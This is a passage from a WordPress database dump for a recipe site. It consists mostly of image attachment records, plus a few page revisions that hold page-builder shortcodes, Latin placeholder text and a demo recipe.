12:01:14','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0023.jpg',0,'attachment','image/jpeg',0),(4943,1,'2020-04-06 12:01:44','2020-04-06 12:01:44','','IMG_0026','','inherit','open','closed','','img_0026','','','2020-04-06 12:01:44','2020-04-06 12:01:44','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0026.jpg',0,'attachment','image/jpeg',0),(4944,1,'2020-04-06 12:03:37','2020-04-06 12:03:37','','Long kale pesto','','inherit','open','closed','','long-kale-pesto','','','2020-04-06 12:03:37','2020-04-06 12:03:37','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Long-kale-pesto.jpg',0,'attachment','image/jpeg',0),(4945,1,'2020-04-06 12:06:45','2020-04-06 12:06:45','','Long breakfast','','inherit','open','closed','','long-breakfast','','','2020-04-06 12:06:45','2020-04-06 12:06:45','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Long-breakfast.jpg',0,'attachment','image/jpeg',0),(4946,1,'2020-04-06 12:11:32','2020-04-06 12:11:32','','icecream landsc3small','','inherit','open','closed','','icecream-landsc3small','','','2020-04-06 12:11:32','2020-04-06 12:11:32','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/icecream-landsc3small.jpg',0,'attachment','image/jpeg',0),(4947,1,'2020-04-06 12:12:25','2020-04-06 12:12:25','','icecream lolly small','','inherit','open','closed','','icecream-lolly-small','','','2020-04-06 12:12:25','2020-04-06 12:12:25','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/icecream-lolly-small.jpg',0,'attachment','image/jpeg',0),(4948,1,'2020-04-06 22:28:05','2020-04-06 22:28:05','','dipped_fruit_square_880x','','inherit','open','closed','','dipped_fruit_square_880x','','','2020-04-06 22:28:05','2020-04-06 22:28:05','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/dipped_fruit_square_880x.jpg',0,'attachment','image/jpeg',0),(4949,1,'2020-04-06 22:28:08','2020-04-06 22:28:08','','hot_chocolate_square_880x','','inherit','open','closed','','hot_chocolate_square_880x','','','2020-04-06 22:28:08','2020-04-06 22:28:08','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/hot_chocolate_square_880x.jpg',0,'attachment','image/jpeg',0),(4950,1,'2020-04-06 22:28:10','2020-04-06 22:28:10','','meringue3_880x','','inherit','open','closed','','meringue3_880x','','','2020-04-06 22:28:10','2020-04-06 22:28:10','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/meringue3_880x.jpg',0,'attachment','image/jpeg',0),(4951,1,'2020-04-06 22:28:12','2020-04-06 22:28:12','','spelt_bread_880x','','inherit','open','closed','','spelt_bread_880x','','','2020-04-06 22:28:12','2020-04-06 22:28:12','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/spelt_bread_880x.jpg',0,'attachment','image/jpeg',0),(4952,1,'2020-04-06 22:28:14','2020-04-06 22:28:14','','wrap_1_880x','','inherit','open','closed','','wrap_1_880x','','','2020-04-06 22:28:14','2020-04-06 22:28:14','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/wrap_1_880x.jpg',0,'attachment','image/jpeg',0),(4953,1,'2020-04-06 22:50:35','2020-04-06 22:50:35','','Christmas_pancakes_insta_880x','','inherit','open','closed','','christmas_pancakes_insta_880x','','','2020-04-06 22:50:35','2020-04-06 22:50:35','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Christmas_pancakes_insta_880x.jpg',0,'attachment','image/jpeg',0),(4954,1,'2020-04-06 22:50:37','2020-04-06 22:50:37','','gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x','','inherit','open','closed','','gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x','','','2020-04-06 22:50:37','2020-04-06 22:50:37','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x.jpg',0,'attachment','image/jpeg',0),(4955,1,'2020-04-06 22:50:38','2020-04-06 22:50:38','','icecream_landsc2small_880x','','inherit','open','closed','','icecream_landsc2small_880x','','','2020-04-06 22:50:38','2020-04-06 22:50:38','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/icecream_landsc2small_880x.jpg',0,'attachment','image/jpeg',0),(4956,1,'2020-04-06 22:50:40','2020-04-06 22:50:40','','Icecream_pineapple2fw_880x','','inherit','open','closed','','icecream_pineapple2fw_880x','','','2020-04-06 22:50:40','2020-04-06 22:50:40','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Icecream_pineapple2fw_880x.jpg',0,'attachment','image/jpeg',0),(4957,1,'2020-04-06 22:50:41','2020-04-06 22:50:41','','icecream4_880x','','inherit','open','closed','','icecream4_880x','','','2020-04-06 22:50:41','2020-04-06 22:50:41','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/icecream4_880x.jpg',0,'attachment','image/jpeg',0),(4958,1,'2020-04-06 22:50:43','2020-04-06 22:50:43','','Kale_Spinach_ballssquare_880x','','inherit','open','closed','','kale_spinach_ballssquare_880x','','','2020-04-06 22:50:43','2020-04-06 22:50:43','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Kale_Spinach_ballssquare_880x.jpg',0,'attachment','image/jpeg',0),(4959,1,'2020-04-06 22:50:45','2020-04-06 22:50:45','','quinoa_muffin_880x','','inherit','open','closed','','quinoa_muffin_880x','','','2020-04-06 22:50:45','2020-04-06 22:50:45','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/quinoa_muffin_880x.jpg',0,'attachment','image/jpeg',0),(4960,1,'2020-04-06 22:50:47','2020-04-06 22:50:47','','sticki_cake_7_880x','','inherit','open','closed','','sticki_cake_7_880x','','','2020-04-06 22:50:47','2020-04-06 22:50:47','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/sticki_cake_7_880x.jpg',0,'attachment','image/jpeg',0),(4961,1,'2020-04-06 22:50:49','2020-04-06 22:50:49','','Turkey_Burger_880x','','inherit','open','closed','','turkey_burger_880x','','','2020-04-06 22:50:49','2020-04-06 22:50:49','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Turkey_Burger_880x.jpg',0,'attachment','image/jpeg',0),(4962,1,'2020-04-06 22:50:51','2020-04-06 22:50:51','','turkey_hash_880x','','inherit','open','closed','','turkey_hash_880x','','','2020-04-06 22:50:51','2020-04-06 22:50:51','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/turkey_hash_880x.jpg',0,'attachment','image/jpeg',0),(4964,1,'2020-04-06 23:02:12','2020-04-06 23:02:12','','Baked_potato_sfw_880x','','inherit','open','closed','','baked_potato_sfw_880x','','','2020-04-06 23:02:12','2020-04-06 23:02:12','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Baked_potato_sfw_880x.jpg',0,'attachment','image/jpeg',0),(4965,1,'2020-04-06 23:02:13','2020-04-06 23:02:13','','crumb_web_880x','','inherit','open','closed','','crumb_web_880x','','','2020-04-06 23:02:13','2020-04-06 23:02:13','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/crumb_web_880x.jpg',0,'attachment','image/jpeg',0),(4966,1,'2020-04-06 23:02:22','2020-04-06 23:02:22','','frit2_880x','','inherit','open','closed','','frit2_880x','','','2020-04-06 23:02:22','2020-04-06 23:02:22','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/frit2_880x.jpg',0,'attachment','image/jpeg',0),(4967,1,'2020-04-06 23:02:23','2020-04-06 23:02:23','','kale_v_small_880x','','inherit','open','closed','','kale_v_small_880x','','','2020-04-06 23:02:23','2020-04-06 23:02:23','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/kale_v_small_880x.jpg',0,'attachment','image/jpeg',0),(4968,1,'2020-04-06 23:02:24','2020-04-06 23:02:24','','latte_880x','','inherit','open','closed','','latte_880x','','','2020-04-06 23:02:24','2020-04-06 23:02:24','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/latte_880x.jpg',0,'attachment','image/jpeg',0),(4969,1,'2020-04-06 23:02:26','2020-04-06 23:02:26','','spice_880x','','inherit','open','closed','','spice_880x','','','2020-04-06 23:02:26','2020-04-06 23:02:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/spice_880x.jpg',0,'attachment','image/jpeg',0),(4970,1,'2020-04-06 23:02:27','2020-04-06 23:02:27','','taco_880x','','inherit','open','closed','','taco_880x','','','2020-04-06 23:02:27','2020-04-06 23:02:27','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/taco_880x.jpg',0,'attachment','image/jpeg',0),(4971,1,'2020-04-06 23:02:28','2020-04-06 23:02:28','','waffles1small_880x','','inherit','open','closed','','waffles1small_880x','','','2020-04-06 23:02:28','2020-04-06 23:02:28','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/waffles1small_880x.jpg',0,'attachment','image/jpeg',0),(4972,1,'2020-04-06 23:02:30','2020-04-06 23:02:30','','www.freepix4all.com','www.freepix4all.com','inherit','open','closed','','www-freepix4all-com','','','2020-04-06 23:02:30','2020-04-06 23:02:30','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x.jpg',0,'attachment','image/jpeg',0),(4973,1,'2020-04-06 23:12:19','2020-04-06 23:12:19','','7583952080_IMG_1091_880x','','inherit','open','closed','','7583952080_img_1091_880x','','','2020-04-06 23:12:19','2020-04-06 23:12:19','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/7583952080_IMG_1091_880x.jpg',0,'attachment','image/jpeg',0),(4974,1,'2020-04-06 23:12:21','2020-04-06 23:12:21','','bruchetta_2_for_web_880x','','inherit','open','closed','','bruchetta_2_for_web_880x','','','2020-04-06 23:12:21','2020-04-06 23:12:21','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/bruchetta_2_for_web_880x.jpg',0,'attachment','image/jpeg',0),(4975,1,'2020-04-06 23:12:23','2020-04-06 23:12:23','','Choc_balls2_880x','','inherit','open','closed','','choc_balls2_880x','','','2020-04-06 23:12:23','2020-04-06 23:12:23','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Choc_balls2_880x.jpg',0,'attachment','image/jpeg',0),(4976,1,'2020-04-06 23:12:26','2020-04-06 23:12:26','','cookie_landscape_880x','','inherit','open','closed','','cookie_landscape_880x','','','2020-04-06 23:12:26','2020-04-06 23:12:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/cookie_landscape_880x.jpg',0,'attachment','image/jpeg',0),(4977,1,'2020-04-06 23:12:29','2020-04-06 23:12:29','','creamy_chicken_stew_880x','','inherit','open','closed','','creamy_chicken_stew_880x','','','2020-04-06 23:12:29','2020-04-06 23:12:29','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/creamy_chicken_stew_880x.jpg',0,'attachment','image/jpeg',0),(4978,1,'2020-04-06 23:12:32','2020-04-06 23:12:32','','maple_sticky_chicken_880x','','inherit','open','closed','','maple_sticky_chicken_880x','','','2020-04-06 23:12:32','2020-04-06 23:12:32','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/maple_sticky_chicken_880x.jpg',0,'attachment','image/jpeg',0),(4979,1,'2020-04-06 23:12:34','2020-04-06 23:12:34','','salad_pot_land_web_880x','','inherit','open','closed','','salad_pot_land_web_880x','','','2020-04-06 23:12:34','2020-04-06 23:12:34','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/salad_pot_land_web_880x.jpg',0,'attachment','image/jpeg',0),(4980,1,'2020-04-06 23:20:54','2020-04-06 23:20:54','','438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x','','inherit','open','closed','','438ec3ba00000578-4823890-a_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x','','','2020-04-06 23:20:54','2020-04-06 23:20:54','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/438EC3BA00000578-4823890-A_team_of_scientists_discovered_that_certain_gene_regulators_in_-a-1_1503682165278_880x.jpg',0,'attachment','image/jpeg',0),(4981,1,'2020-04-06 23:20:56','2020-04-06 23:20:56','','bolognese_880x','','inherit','open','closed','','bolognese_880x','','','2020-04-06 23:20:56','2020-04-06 23:20:56','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/bolognese_880x.jpg',0,'attachment','image/jpeg',0),(4982,1,'2020-04-06 23:20:58','2020-04-06 23:20:58','','chicken_skewers_landscape_880x','','inherit','open','closed','','chicken_skewers_landscape_880x','','','2020-04-06 23:20:58','2020-04-06 23:20:58','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/chicken_skewers_landscape_880x.jpg',0,'attachment','image/jpeg',0),(4983,1,'2020-04-06 23:20:59','2020-04-06 23:20:59','','green_beans_880x','','inherit','open','closed','','green_beans_880x','','','2020-04-06 23:20:59','2020-04-06 23:20:59','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/green_beans_880x.jpg',0,'attachment','image/jpeg',0),(4984,1,'2020-04-06 23:21:00','2020-04-06 23:21:00','','KCL_logo_880x','','inherit','open','closed','','kcl_logo_880x','','','2020-04-06 23:21:00','2020-04-06 23:21:00','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/KCL_logo_880x.jpg',0,'attachment','image/jpeg',0),(4985,1,'2020-04-06 23:21:01','2020-04-06 23:21:01','','MG_6899-2_880x','','inherit','open','closed','','mg_6899-2_880x','','','2020-04-06 23:21:01','2020-04-06 23:21:01','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_6899-2_880x.jpg',0,'attachment','image/jpeg',0),(4986,1,'2020-04-06 23:21:02','2020-04-06 23:21:02','','MG_7208_880x','','inherit','open','closed','','mg_7208_880x','','','2020-04-06 23:21:02','2020-04-06 23:21:02','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_7208_880x.jpg',0,'attachment','image/jpeg',0),(4987,1,'2020-04-06 23:21:03','2020-04-06 23:21:03','','roll_sfw1_880x','','inherit','open','closed','','roll_sfw1_880x','','','2020-04-06 23:21:03','2020-04-06 23:21:03','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/roll_sfw1_880x.jpg',0,'attachment','image/jpeg',0),(4988,1,'2020-04-06 23:29:21','2020-04-06 23:29:21','','1_880x','','inherit','open','closed','','1_880x','','','2020-04-06 23:29:21','2020-04-06 23:29:21','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/1_880x.jpg',0,'attachment','image/jpeg',0),(4989,1,'2020-04-06 23:29:22','2020-04-06 23:29:22','','123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x','','inherit','open','closed','','123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x','','','2020-04-06 23:29:22','2020-04-06 23:29:22','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x.jpg',0,'attachment','image/jpeg',0),(4990,1,'2020-04-06 23:29:23','2020-04-06 23:29:23','','Bread_880x','','inherit','open','closed','','bread_880x','','','2020-04-06 23:29:23','2020-04-06 23:29:23','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Bread_880x.jpg',0,'attachment','image/jpeg',0),(4991,1,'2020-04-06 23:29:23','2020-04-06 23:29:23','','Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x','','inherit','open','closed','','courgette_slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x','','','2020-04-06 23:29:23','2020-04-06 23:29:23','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x.jpg',0,'attachment','image/jpeg',0),(4992,1,'2020-04-06 23:29:25','2020-04-06 23:29:25','','IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x','','inherit','open','closed','','img_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x','','','2020-04-06 23:29:25','2020-04-06 23:29:25','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x.jpg',0,'attachment','image/jpeg',0),(4993,1,'2020-04-06 23:29:27','2020-04-06 23:29:27','','Nutty_Banana_Oatcakes_880x','','inherit','open','closed','','nutty_banana_oatcakes_880x','','','2020-04-06 23:29:27','2020-04-06 23:29:27','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Nutty_Banana_Oatcakes_880x.jpg',0,'attachment','image/jpeg',0),(4994,1,'2020-04-06 23:29:28','2020-04-06 23:29:28','','pbtr_cup_2_880x','','inherit','open','closed','','pbtr_cup_2_880x','','','2020-04-06 23:29:28','2020-04-06 23:29:28','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/pbtr_cup_2_880x.jpg',0,'attachment','image/jpeg',0),(4995,1,'2020-04-06 23:29:29','2020-04-06 23:29:29','','Potato_Fritters_880x','','inherit','open','closed','','potato_fritters_880x','','','2020-04-06 23:29:29','2020-04-06 23:29:29','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Potato_Fritters_880x.jpg',0,'attachment','image/jpeg',0),(4996,1,'2020-04-06 23:29:31','2020-04-06 23:29:31','','rasp2_880x','','inherit','open','closed','','rasp2_880x','','','2020-04-06 23:29:31','2020-04-06 23:29:31','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/rasp2_880x.jpg',0,'attachment','image/jpeg',0),(4997,1,'2020-04-06 23:37:26','2020-04-06 23:37:26','','IMG_1357_880x','','inherit','open','closed','','img_1357_880x','','','2020-04-06 23:37:26','2020-04-06 23:37:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_1357_880x.jpg',0,'attachment','image/jpeg',0),(4998,1,'2020-04-06 23:37:27','2020-04-06 23:37:27','','pesto_94240780-a042-4135-9a51-18238209d2cd_880x','','inherit','open','closed','','pesto_94240780-a042-4135-9a51-18238209d2cd_880x','','','2020-04-06 23:37:27','2020-04-06 23:37:27','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/pesto_94240780-a042-4135-9a51-18238209d2cd_880x.jpg',0,'attachment','image/jpeg',0),(4999,1,'2020-04-06 23:41:40','2020-04-06 23:41:40','','IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x','','inherit','open','closed','','img_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x','','','2020-04-06 23:41:40','2020-04-06 23:41:40','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x.jpg',0,'attachment','image/jpeg',0),(5000,1,'2020-04-06 23:41:42','2020-04-06 23:41:42','','IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x','','inherit','open','closed','','img_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x','','','2020-04-06 23:41:42','2020-04-06 23:41:42','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_1644_2048x2048_235e5e5b-749c-4a14-ac47-50ff981fc0bf_880x.jpg',0,'attachment','image/jpeg',0),(5001,1,'2020-04-06 23:41:43','2020-04-06 23:41:43','','IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x','','inherit','open','closed','','img_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x','','','2020-04-06 23:41:43','2020-04-06 23:41:43','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_2571_grande_f118c792-553d-4732-98c1-932f2271a7c2_880x.jpg',0,'attachment','image/jpeg',0),(5002,1,'2020-04-09 11:45:24','2020-04-09 11:45:24','','Logo-New-TR-web-1','','inherit','open','closed','','logo-new-tr-web-1','','','2020-04-09 11:45:34','2020-04-09 11:45:34','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Logo-New-TR-web-1.jpg',0,'attachment','image/jpeg',0),(5003,1,'2020-04-07 12:08:20','0000-00-00 00:00:00','','\\','','draft','open','closed','','','','','2020-04-07 12:08:20','2020-04-07 12:08:20','',0,'http://tummyrevolution.com/?post_type=portfolio-item&p=5003',0,'portfolio-item','',0),(5004,1,'2020-04-07 17:08:23','2020-04-07 17:08:23','[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-07 17:08:23','2020-04-07 17:08:23','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5006,1,'2020-04-07 17:30:12','2020-04-07 17:30:12','','carrot 1943 x1300','','inherit','open','closed','','carrot-1943-x1300','','','2020-04-07 17:30:12','2020-04-07 17:30:12','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/carrot-1943-x1300.jpg',0,'attachment','image/jpeg',0),(5007,1,'2020-04-07 17:30:17','2020-04-07 17:30:17','','drink ornage new website','','inherit','open','closed','','drink-ornage-new-website-2','','','2020-04-07 17:30:17','2020-04-07 17:30:17','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/drink-ornage-new-website.jpg',0,'attachment','image/jpeg',0),(5008,1,'2020-04-07 17:30:26','2020-04-07 17:30:26','','fish 1300x1943','','inherit','open','closed','','fish-1300x1943','','','2020-04-07 17:30:26','2020-04-07 17:30:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/fish-1300x1943-1.jpg',0,'attachment','image/jpeg',0),(5009,1,'2020-04-07 17:30:31','2020-04-07 17:30:31','','green & yellow flavoured water NW','','inherit','open','closed','','green-yellow-flavoured-water-nw','','','2020-04-07 17:30:31','2020-04-07 17:30:31','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/green-yellow-flavoured-water-NW.jpg',0,'attachment','image/jpeg',0),(5010,1,'2020-04-07 17:30:38','2020-04-07 17:30:38','','orange &banana ready 1300 x 1945','','inherit','open','closed','','orange-banana-ready-1300-x-1945-2','','','2020-04-07 17:30:38','2020-04-07 17:30:38','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/orange-banana-ready-1300-x-1945.jpg',0,'attachment','image/jpeg',0),(5011,1,'2020-04-07 17:30:43','2020-04-07 17:30:43','','pesto for new web','','inherit','open','closed','','pesto-for-new-web','','','2020-04-07 17:30:43','2020-04-07 17:30:43','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/pesto-for-new-web.jpg',0,'attachment','image/jpeg',0),(5012,1,'2020-04-07 17:30:54','2020-04-07 17:30:54','','soup 1943 x 1300','','inherit','open','closed','','soup-1943-x-1300','','','2020-04-07 17:30:54','2020-04-07 17:30:54','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/soup-1943-x-1300.jpg',0,'attachment','image/jpeg',0),(5013,1,'2020-04-07 17:33:02','2020-04-07 17:33:02','','recipe website','','inherit','open','closed','','recipe-website-2','','','2020-04-07 17:33:02','2020-04-07 17:33:02','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/recipe-website.jpg',0,'attachment','image/jpeg',0),(5014,1,'2020-04-07 17:36:21','2020-04-07 17:36:21','','orange tea 1943 x 1300','','inherit','open','closed','','orange-tea-1943-x-1300','','','2020-04-07 17:36:21','2020-04-07 17:36:21','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/orange-tea-1943-x-1300.jpg',0,'attachment','image/jpeg',0),(5015,1,'2020-04-07 17:37:14','2020-04-07 17:37:14','','drink gren 1943x1300','','inherit','open','closed','','drink-gren-1943x1300','','','2020-04-07 17:37:14','2020-04-07 17:37:14','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/drink-gren-1943x1300-1.jpg',0,'attachment','image/jpeg',0),(5016,1,'2020-04-07 17:49:29','2020-04-07 17:49:29','','Icecream pineapplefw','','inherit','open','closed','','icecream-pineapplefw','','','2020-04-07 17:49:29','2020-04-07 17:49:29','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Icecream-pineapplefw.jpg',0,'attachment','image/jpeg',0),(5017,1,'2020-04-09 09:38:59','2020-04-09 09:38:59','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Fruit Bowl','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2070-revision-v1','','','2020-04-09 09:38:59','2020-04-09 09:38:59','',2070,'http://tummyrevolution.com/2070-revision-v1/',0,'revision','',0),(5018,1,'2020-04-09 09:46:56','2020-04-09 09:46:56','','orange &banana ready 1300 x 1945','','inherit','open','closed','','orange-banana-ready-1300-x-1945-3','','','2020-04-09 09:46:56','2020-04-09 09:46:56','',2120,'http://tummyrevolution.com/wp-content/uploads/2018/01/orange-banana-ready-1300-x-1945-2.jpg',0,'attachment','image/jpeg',0),(5019,1,'2020-04-09 09:48:42','2020-04-09 09:48:42','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px 